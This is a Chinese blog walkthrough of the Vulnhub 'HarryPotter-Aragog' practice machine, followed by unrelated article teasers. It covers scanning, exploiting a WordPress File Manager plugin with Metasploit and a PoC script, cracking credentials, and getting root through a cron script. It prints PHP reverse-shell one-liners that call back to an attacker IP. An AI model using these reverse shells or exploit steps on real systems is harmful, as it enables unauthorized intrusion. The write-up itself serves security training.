当前位置: 首页 > news >正文

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

文章目录

    • 方式一
      • 信息收集
        • 主机发现
        • 端口扫描
        • 目录扫描
        • wpscan工具
      • 漏洞利用
        • msf工具
        • 数据库权限
        • 用户权限
        • root提权
    • 方式二
      • 信息收集
        • gobuster扫描
        • wpscan扫描
      • 漏洞利用
        • POC

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

image-20230909141557109

方式一

信息收集

主机发现

 sudo arp-scan -l

image-20230909142434034

端口扫描

image-20230909142758976

目录扫描

image-20230909143001315

看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

index.html

在这里插入图片描述

blog

网页没有样式

image-20230909143611031

查看网页源码

image-20230909145217560

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

image-20230909150646841

发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909152924966

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具

msf6 > search wordpress file manager

image-20230909152800629

use 1
info

查看需要配置的信息

image-20230909153122178

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

image-20230909153409333

hagrid98家目录下得到一串base64格式加密的数据

image-20230909153659725

使用BurpSuiteDecoder功能解码

image-20230909154142824

image-20230909154319918

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

image-20230909154904019

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

image-20230909155308470

image-20230909155207845

使用得到用户名root,密码mySecr3tPass,来连接数据库

image-20230909155552313

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

image-20230909155648996

在线解密网站

image-20230909155752228

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

image-20230909160013119

root提权

使用sudo suid查询后发现没有可利用的

image-20230909160301316

然后查找备份文件,查看有没有.sh结尾的文件

find / -name '*.sh'

image-20230909160243232

image-20230909160620277

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

image-20230909164505639

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell


kali监听6868端口

image-20230909161708723

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

image-20230909162429837

image-20230909164442869

方式二

信息收集

gobuster扫描

└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

image-20230909165253792

wpscan扫描

wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909165849419

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

image-20230909170028124

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

image-20230909170702430

生成反弹 shell写入到payload.php文件里

php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20230909171334454

运行脚本,得到反弹shell地址

image-20230909171426970

地址中多写了一个/blog,删除即可

image-20230909171908665

等一会就反弹到了

image-20230909172037019

相关文章:

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

文章目录 方式一信息收集主机发现端口扫描目录扫描wpscan工具 漏洞利用msf工具数据库权限用户权限root提权 方式二信息收集gobuster扫描wpscan扫描 漏洞利用POC 靶机文档&#xff1a;HarryPotter: Aragog (1.0.2) 下载地址&#xff1a;Download (Mirror) 方式一 信息收集 主机…...

.NET 8发布首个RC,比.NET 7的超级快更快

.NET 8 发布了首个 RC。据称 RC 阶段会发布两个版本&#xff0c;正式版将于 2023 年 11 月 14 日至 16 日在 .NET Conf 2023 上推出。.NET 8 是长期支持 (LTS) 版本&#xff0c;将会获得 3 年技术支持。 公告写道&#xff0c;此版本为 Android 和 WASM 引入了全新的 AOT 模式、…...

在 Substance Painter中自定义Shader

为什么要学习在Substance Painter中自定义Shader&#xff1f; 答&#xff1a;需要实现引擎与Substance Painter中的渲染效果一致&#xff0c;材质的配置也一致&#xff0c;所见即所得。 基础概述 首先在着色器设置这里&#xff0c;我们可以查看当前渲染使用的着色器 如果没有…...

【自学开发之旅】Flask-restful-Jinjia页面编写template-回顾(五)

restful是web编程里重要的概念 – 一种接口规范也是一种接口设计风格 设计接口&#xff1a; 要考虑&#xff1a;数据返回、接收数据的方式、url、方法 统一风格 rest–表现层状态转移 web–每一类数据–资源 资源通过http的动作来实现状态转移 GET、PUT、POST、DELETE path…...

input 的 placeholder 样式

::placeholder 伪元素 这个伪元素可以改变 input、textarea 占位文本的样式。 input::placeholder {color: green; }完整的兼容性写法&#xff1a; input {&::-webkit-input-placeholder, /* WebKit browsers*/ &:-moz-input-placeholder, /* Mozilla Firefox 4 to …...

4.4-Spring源码循环依赖终极讲解

回顾上期内容 new 容器 new AnnotateBeanDefinitionReader 的时候创建很多创世纪的类&#xff0c;其中有一个ConfigurationPostProcessor是用来解析配置类的&#xff0c;将其注册起来存到Bean定义的Map中【这个类是基于Bean工厂后置处理器的】 这一步是将配置类注册到Bean定…...

腾讯云4核8G服务器选CVM还是轻量比较好?价格对比

腾讯云4核8G云服务器可以选择轻量应用服务器或CVM云服务器标准型S5实例&#xff0c;轻量4核8G12M服务器446元一年&#xff0c;CVM S5云服务器935元一年&#xff0c;相对于云服务器CVM&#xff0c;轻量应用服务器性价比更高&#xff0c;轻量服务器CPU和CVM有区别吗&#xff1f;性…...

数学实验-素数(Mathematica实现)

一、实验名称&#xff1a;素数 二、实验环境&#xff1a;Mathematica 10.3软件 三、实验目的&#xff1a;本实验将探讨素数的规律&#xff0c;研究素数的判别、最大的素数、构成生成素数的公式和素数的分布&#xff0c;并学会求解某些范围内的素数。 四、实验内容、步骤以及…...

Vue3样式绑定

文章目录 Vue3样式绑定1. class 属性绑定1.1 v-bind:class 设置一个对象&#xff0c;从而动态的切换 class1.2 在对象中传入更多属性用来动态切换多个 class1.3 直接绑定数据里的一个对象1.4 绑定一个返回对象的计算属性。这是一个常用且强大的模式1. 5 数据语法1.6 errorClass…...

【深度学习】 Python 和 NumPy 系列教程(廿二):Matplotlib详解:2、3d绘图类型(8)3D饼图(3D Pie Chart)

一、前言 Python是一种高级编程语言&#xff0c;由Guido van Rossum于1991年创建。它以简洁、易读的语法而闻名&#xff0c;并且具有强大的功能和广泛的应用领域。Python具有丰富的标准库和第三方库&#xff0c;可以用于开发各种类型的应用程序&#xff0c;包括Web开发、数据分…...

数仓主题域和数据域、雪花模型,星型模型和星座模型

数仓模型和领域划分 一、主题域和数据域的差别二、雪花模型&#xff0c;星座模型和星型模型 一、主题域和数据域的差别 明确数据域作为数仓搭建的重要一环&#xff0c;能够让数仓的数据便于管理和应用。 数据域和主题域都是数据仓库中的重要概念&#xff0c;但含义略有不同&am…...

黑马头条 热点文章实时计算、kafkaStream

热点文章-实时计算 1 今日内容 1.1 定时计算与实时计算 1.2 今日内容 kafkaStream 什么是流式计算kafkaStream概述kafkaStream入门案例Springboot集成kafkaStream 实时计算 用户行为发送消息kafkaStream聚合处理消息更新文章行为数量替换热点文章数据 2 实时流式计算 2…...

数据分析:利用gpt进行归因分析

prompt&#xff1a; 你是某电商平台的一名数据分析师&#xff0c;发现昨日的GMV环比下降了5%&#xff0c;请对这数据变动做出归因。 output&#xff1a; 在电商行业中&#xff0c;GMV&#xff08;总销售额&#xff09;是一个非常重要的指标&#xff0c;用于衡量业务的整体健康…...

Python工程师Java之路(p)Module和Package

文章目录 1、Python的Module和Package2、Java的Module和Package2.1、Module2.1.1、分模块开发意义2.1.2、模块的调用 2.2、Package Module通常译作模块&#xff0c;Package通常译作包 1、Python的Module和Package Python模块&#xff08;Module&#xff09;&#xff1a;1个以.…...

某计费管理系统任意文件读取漏洞

文章目录 声明一、漏洞描述二、漏洞复现声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、漏洞描述 蓝海…...

LeetCode:1929.数组串联

1929. 数组串联 来源:力扣(LeetCode) 链接: https://leetcode.cn/problems/concatenation-of-array/description/ 给你一个长度为 n 的整数数组 nums 。请你构建一个长度为 2n 的答案数组 ans ,数组下标 从 0 开始计数 ,对于所有 0 < = i < n 0 <= i < n …...

记录:移动设备软件开发(activity组件)

目录 前言Android简介和发展Android应用的基本组件介绍Activity组件Activity简介Activity的状态和生命周期 小结 前言 移动设备软件开发是指为智能手机、平板电脑等移动设备设计和开发应用程序的过程。移动设备软件开发涉及多种技术、平台和工具&#xff0c;例如Android、iOS、…...

Redis常用应用场景

Redis是一款开源的基于内存的键值存储系统&#xff0c;它提供了多种数据结构和丰富的功能&#xff0c;适用于各种不同的应用场景。以下是Redis常用的应用场景&#xff1a; 1.缓存&#xff1a;Redis最常见的用途就是作为缓存。由于Redis存储在内存中&#xff0c;读取速度非常快…...

grafana 监控无图解决

环境 k8s 1.26.0 helm 部署的prometheus charts为 prometheus-community/kube-prometheus-stack 问题 部署上之后,发现grafana很多dashboard无图。 处理过程 进grafana dashboards 任意选取一张有问题的图,查看查询语句,如下 sum(container_memory_rss{job="kube…...

Linux--进程-消息队列

一、 消息队列&#xff0c;是消息的链接表&#xff0c;存放在内核中。一个消息队列有一个人标识符&#xff08;及队列ID&#xff09;来标识。 1、特点&#xff1a; ①、消息队列是面向记录的&#xff0c;其中的消息具有特定的格式以及待定的优先级。 ②、消息队列独立与发送与…...

终极指南:如何为MiniSearch编写自定义插件和扩展,打造专属搜索体验

终极指南&#xff1a;如何为MiniSearch编写自定义插件和扩展&#xff0c;打造专属搜索体验 【免费下载链接】minisearch Tiny and powerful JavaScript full-text search engine for browser and Node 项目地址: https://gitcode.com/gh_mirrors/mi/minisearch MiniSear…...

如何构建现代搜索应用:ReactiveSearch与GraphQL的终极集成指南

如何构建现代搜索应用&#xff1a;ReactiveSearch与GraphQL的终极集成指南 【免费下载链接】reactivesearch Search UI components for React and Vue 项目地址: https://gitcode.com/gh_mirrors/re/reactivesearch ReactiveSearch是一个强大的React和Vue搜索UI组件库&a…...

Vivado+Vitis双剑合璧:从零构建Zynq-7020的SD卡Linux系统启动镜像

VivadoVitis双剑合璧&#xff1a;从零构建Zynq-7020的SD卡Linux系统启动镜像 在嵌入式系统开发领域&#xff0c;Xilinx Zynq系列SoC凭借其独特的ARM处理器与FPGA可编程逻辑的完美结合&#xff0c;成为众多高性能嵌入式应用的理想选择。本文将带领开发者深入探索如何利用Vivado和…...

拉丝机在紧固件生产中的作用与工艺流程_6月FES上海紧固件展

2026第十六届上海紧固件专业展将于6月24日至26日在国家会展中心&#xff08;上海&#xff09;举行。本届展会由上海上搜展览与华人螺丝网联合打造&#xff0c;并获得行业权威机构支持&#xff0c;整体展出规模约70,000平方米&#xff0c;预计汇聚1,400余家参展企业和25,000名专…...

CTF新手必看:攻防世界幂数加密题解(附Python脚本)

CTF密码学实战&#xff1a;从零破解幂数加密的完整指南 第一次接触CTF密码学题目时&#xff0c;看到那串神秘数字"8842101220480224404014224202480122"&#xff0c;我的大脑就像被加密了一样完全空白。直到理解了幂数加密的精髓&#xff0c;才发现这不过是字母游戏…...

Youtu-Parsing镜像免配置:预置outputs目录权限+日志轮转自动配置

Youtu-Parsing镜像免配置&#xff1a;预置outputs目录权限日志轮转自动配置 1. 引言&#xff1a;告别繁琐配置&#xff0c;专注文档解析 如果你用过一些AI模型&#xff0c;肯定遇到过这样的麻烦&#xff1a;好不容易把服务跑起来了&#xff0c;结果发现生成的图片没地方保存&…...

Qwen3智能字幕系统效果展示:法庭庭审录音→高司法术语准确率字幕

Qwen3智能字幕系统效果展示&#xff1a;法庭庭审录音→高司法术语准确率字幕 1. 引言&#xff1a;当AI成为“数字书记员” 想象一下这样的场景&#xff1a;一场长达数小时的法庭庭审正在进行&#xff0c;书记员的手指在键盘上飞速敲击&#xff0c;试图跟上律师与证人间密集、…...

科研党效率翻倍:Texmaker这些隐藏功能让你的论文排版快人一步

Texmaker科研效率革命&#xff1a;解锁高阶玩家的12个生产力加速器 在深夜实验室的灯光下&#xff0c;你盯着屏幕上纠缠不清的LaTeX代码&#xff0c;参考文献格式突然崩溃&#xff0c;数学公式编号混乱不堪——这场景是否似曾相识&#xff1f;Texmaker作为LaTeX编辑器的隐藏冠军…...

SiameseAOE中文-base多场景落地:金融投诉文本中‘服务态度’‘处理时效’双抽取

SiameseAOE中文-base多场景落地&#xff1a;金融投诉文本中‘服务态度’‘处理时效’双抽取 1. 模型简介 SiameseAOE通用属性观点抽取-中文-base是一个专门用于中文文本信息抽取的AI模型。它基于先进的提示&#xff08;Prompt&#xff09;文本&#xff08;Text&#xff09;构…...

终极Windows XP错误对话框组件:怀旧系统提示的优雅实现指南

终极Windows XP错误对话框组件&#xff1a;怀旧系统提示的优雅实现指南 【免费下载链接】winXP &#x1f3c1; Web based Windows XP desktop recreation. 项目地址: https://gitcode.com/gh_mirrors/wi/winXP 你是否怀念Windows XP那个经典的错误提示对话框&#xff1…...